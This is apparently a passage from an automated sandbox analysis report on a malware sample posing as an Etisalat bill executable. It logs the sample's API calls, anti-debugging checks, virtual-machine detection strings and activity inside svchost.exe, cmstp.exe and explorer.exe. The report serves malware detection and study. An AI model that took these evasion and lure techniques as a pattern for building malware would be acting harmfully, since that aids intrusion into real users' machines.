          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372Thread sleep count: 8170 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372Thread sleep time: -16340000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BC4696
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BCC9C7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCC93C FindFirstFileW,FindClose,0_2_00BCC93C
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF200
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF35D
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCF65E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3A2B
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3D4E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCBF27
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW,4_2_00ADB3C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AD894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose,4_2_00AD894B
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B64AFE
          Source: explorer.exe, 00000003.00000003.3096650993.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000003.00000003.3096650993.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.3096650993.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-99026
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-99125
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD41FD BlockInput,0_2_00BD41FD
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63B4C
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B95CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B95CCC
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BDC304 LoadLibraryA,GetProcAddress,0_2_00BDC304
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_015E3560 mov eax, dword ptr fs:[00000030h]0_2_015E3560
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_015E3500 mov eax, dword ptr fs:[00000030h]0_2_015E3500
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_015E1ED0 mov eax, dword ptr fs:[00000030h]0_2_015E1ED0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
